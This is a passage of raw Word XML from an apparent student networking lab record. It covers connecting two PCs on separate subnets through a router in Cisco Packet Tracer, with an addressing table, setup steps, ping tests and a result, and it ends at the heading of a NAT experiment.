          <w:trHeight w:val="531"/>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C572940" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66D66ED0" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B66176D" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="269D7FB9" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Subnet Mask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0339AEDB" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Default Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F102DC" w14:paraId="2BDB3E0E" w14:textId="77777777" w:rsidTr="00F102DC">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E17A2CC" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BCD2D5F" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>GigabitEthernet0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6952775E" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>192.168.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BBA3388" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>255.255.255.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5157AED7" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F102DC" w14:paraId="60BB7A5C" w14:textId="77777777" w:rsidTr="00F102DC">
        <w:trPr>
          <w:trHeight w:val="531"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14E871A9" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="345D1A51" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>GigabitEthernet0/1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72C7588F" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>192.168.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649D5C8F" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>255.255.255.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03F4C879" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F102DC" w14:paraId="5C64B1C0" w14:textId="77777777" w:rsidTr="00F102DC">
        <w:trPr>
          <w:trHeight w:val="531"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1352024D" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>PC0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C2F0682" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>FastEthernet0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43198E74" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>192.168.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="467AE131" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>255.255.255.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="731DE199" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>192.168.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F102DC" w14:paraId="1961D43E" w14:textId="77777777" w:rsidTr="00F102DC">
        <w:trPr>
          <w:trHeight w:val="531"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E0406AB" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>PC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B808186" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>FastEthernet0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BF5BC62" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>192.168.2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D48D91E" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>255.255.255.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EBDFB63" w14:textId="77777777" w:rsidR="00F102DC" w:rsidRDefault="00F102DC">
            <w:r>
              <w:t>192.168.2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="277E4A59" w14:textId="48E2AE5D" w:rsidR="009D5CE2" w:rsidRDefault="009D5CE2" w:rsidP="00D038EC"/>
    <w:p w14:paraId="754AAA65" w14:textId="6119FED4" w:rsidR="0013621D" w:rsidRPr="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013621D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C77CBA4" w14:textId="77777777" w:rsidR="0013621D" w:rsidRPr="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0013621D">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cisco Packet Tracer</w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC4299" w14:textId="77777777" w:rsidR="0013621D" w:rsidRPr="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0013621D">
        <w:t xml:space="preserve">Drag and place </w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>one router</w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>two PCs</w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7923B042" w14:textId="77777777" w:rsidR="0013621D" w:rsidRPr="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0013621D">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copper Straight-Through</w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:t xml:space="preserve"> cables to connect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692DDB85" w14:textId="77777777" w:rsidR="0013621D" w:rsidRPr="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0013621D">
        <w:t>PC0 → Router G0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B6DC9" w14:textId="77777777" w:rsidR="0013621D" w:rsidRPr="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0013621D">
        <w:lastRenderedPageBreak/>
        <w:t>PC1 → Router G0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF8426" w14:textId="3D5203CD" w:rsidR="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0013621D">
        <w:t xml:space="preserve">Configure the </w:t>
      </w:r>
      <w:r w:rsidRPr="0013621D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>router interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262007B" w14:textId="77777777" w:rsidR="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>IP settings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for each PC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B96081" w14:textId="77777777" w:rsidR="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PC0 → 192.168.1.2 / 255.255.255.0 / Gateway 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E15D6" w14:textId="0A8EBBBE" w:rsidR="00AE37E1" w:rsidRDefault="0013621D" w:rsidP="00AE37E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PC1 → 192.168.2.2 / 255.255.255.0 / Gateway 192.168.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D7C918" w14:textId="77777777" w:rsidR="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test connectivity using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A971B" w14:textId="77777777" w:rsidR="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From PC0 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ping 192.168.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4493A42D" w14:textId="77777777" w:rsidR="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From PC1 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ping 192.168.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E231E" w14:textId="0C3A9C2F" w:rsidR="0013621D" w:rsidRDefault="0013621D" w:rsidP="00AE37E1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify that </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE37E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>all packets are successfully sent and received</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14C0AA" w14:textId="77777777" w:rsidR="0013621D" w:rsidRPr="0013621D" w:rsidRDefault="0013621D" w:rsidP="0013621D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE32124" w14:textId="48D10B3C" w:rsidR="004709F3" w:rsidRDefault="00AE37E1" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00AE37E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Topology</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E50A3" w14:textId="0014E50F" w:rsidR="00220159" w:rsidRDefault="00220159" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00220159">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CA42234" wp14:editId="2685ECCD">
            <wp:extent cx="5731510" cy="1977390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="82478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84075" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1977390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1432DF" w14:textId="77777777" w:rsidR="00220159" w:rsidRDefault="00220159" w:rsidP="00D038EC"/>
    <w:p w14:paraId="71599C8D" w14:textId="77777777" w:rsidR="00220159" w:rsidRDefault="00220159" w:rsidP="00D038EC"/>
    <w:p w14:paraId="0F924725" w14:textId="3EC51BD5" w:rsidR="00220159" w:rsidRDefault="00220159" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00220159">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B096F" w14:textId="787A0A0C" w:rsidR="00220159" w:rsidRDefault="00220159" w:rsidP="00D038EC">
      <w:r>
        <w:t>From pc0 to pc1</w:t>
      </w:r>
      <w:r w:rsidR="007F18E0">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473DF03C" w14:textId="1D4C3370" w:rsidR="007F18E0" w:rsidRDefault="007F18E0" w:rsidP="00D038EC">
      <w:r w:rsidRPr="007F18E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F5E196C" wp14:editId="6D01E460">
            <wp:extent cx="4496427" cy="2219635"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="26295477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54776" name="Picture 1" descr="A computer screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4496427" cy="2219635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B2AA3F" w14:textId="77777777" w:rsidR="0013036F" w:rsidRDefault="0013036F" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1A34A6A8" w14:textId="072C6BB3" w:rsidR="007F18E0" w:rsidRDefault="007F18E0" w:rsidP="00D038EC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>From pc1 to pc0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1456F" w14:textId="69BC5A8C" w:rsidR="007F18E0" w:rsidRDefault="00546BE8" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00546BE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EA8DBD" wp14:editId="32FA3F4F">
            <wp:extent cx="4801270" cy="2181529"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12655745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74541" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4801270" cy="2181529"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66DB83" w14:textId="77777777" w:rsidR="007F18E0" w:rsidRDefault="007F18E0" w:rsidP="00D038EC"/>
    <w:p w14:paraId="7B2EDD1C" w14:textId="35DD4891" w:rsidR="0049204D" w:rsidRDefault="0049204D" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00E63FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attachment</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79124B2F" w14:textId="2948A7D4" w:rsidR="0049204D" w:rsidRDefault="00962BAB" w:rsidP="00D038EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:object w:dxaOrig="1520" w:dyaOrig="987" w14:anchorId="60CCBBAC">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:75.6pt;height:49.2pt" o:ole="">
            <v:imagedata r:id="rId30" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1027" DrawAspect="Icon" ObjectID="_1823145911" r:id="rId31"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9B4055" w14:textId="77777777" w:rsidR="007F18E0" w:rsidRDefault="007F18E0" w:rsidP="00D038EC"/>
    <w:p w14:paraId="7155DA51" w14:textId="705962B0" w:rsidR="0013036F" w:rsidRDefault="0013036F" w:rsidP="00D038EC">
      <w:r w:rsidRPr="0013036F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63807BA8" w14:textId="213FE39F" w:rsidR="0069585A" w:rsidRDefault="00546BE8" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00546BE8">
        <w:t xml:space="preserve">The two PCs on different networks were able to communicate with each other through the router. Hence, the experiment was </w:t>
      </w:r>
      <w:r w:rsidRPr="00546BE8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>successfully demonstrated</w:t>
      </w:r>
      <w:r w:rsidRPr="00546BE8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DE8FD" w14:textId="77777777" w:rsidR="0069585A" w:rsidRDefault="0069585A" w:rsidP="00D038EC"/>
    <w:p w14:paraId="0E2A2167" w14:textId="77777777" w:rsidR="0069585A" w:rsidRDefault="0069585A" w:rsidP="00D038EC"/>
    <w:p w14:paraId="7993E97B" w14:textId="77777777" w:rsidR="0069585A" w:rsidRDefault="0069585A" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1F0F0903" w14:textId="77777777" w:rsidR="0069585A" w:rsidRDefault="0069585A" w:rsidP="00D038EC"/>
    <w:p w14:paraId="05F17E2A" w14:textId="77777777" w:rsidR="00546BE8" w:rsidRDefault="00546BE8" w:rsidP="00D038EC"/>
    <w:p w14:paraId="38F23724" w14:textId="77777777" w:rsidR="00546BE8" w:rsidRDefault="00546BE8" w:rsidP="00D038EC"/>
    <w:p w14:paraId="39706B29" w14:textId="77777777" w:rsidR="00546BE8" w:rsidRDefault="00546BE8" w:rsidP="00D038EC"/>
    <w:p w14:paraId="31C6B2CC" w14:textId="77777777" w:rsidR="00546BE8" w:rsidRDefault="00546BE8" w:rsidP="00D038EC"/>
    <w:p w14:paraId="7BD84FE6" w14:textId="77777777" w:rsidR="00546BE8" w:rsidRDefault="00546BE8" w:rsidP="00D038EC"/>
    <w:p w14:paraId="69071187" w14:textId="77777777" w:rsidR="00546BE8" w:rsidRDefault="00546BE8" w:rsidP="00D038EC"/>
    <w:p w14:paraId="41EA2BB9" w14:textId="77777777" w:rsidR="00546BE8" w:rsidRDefault="00546BE8" w:rsidP="00D038EC"/>
    <w:p w14:paraId="121704BD" w14:textId="7E34EA1B" w:rsidR="00546BE8" w:rsidRDefault="004C6A73" w:rsidP="004C6A73">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="004C6A73">
        <w:lastRenderedPageBreak/>
        <w:t>EXAMINE NETWORK ADDRESS TRANSLATION (NAT) USING CISCO PACKET TRACER</w:t>
      </w:r>
    </w:p>
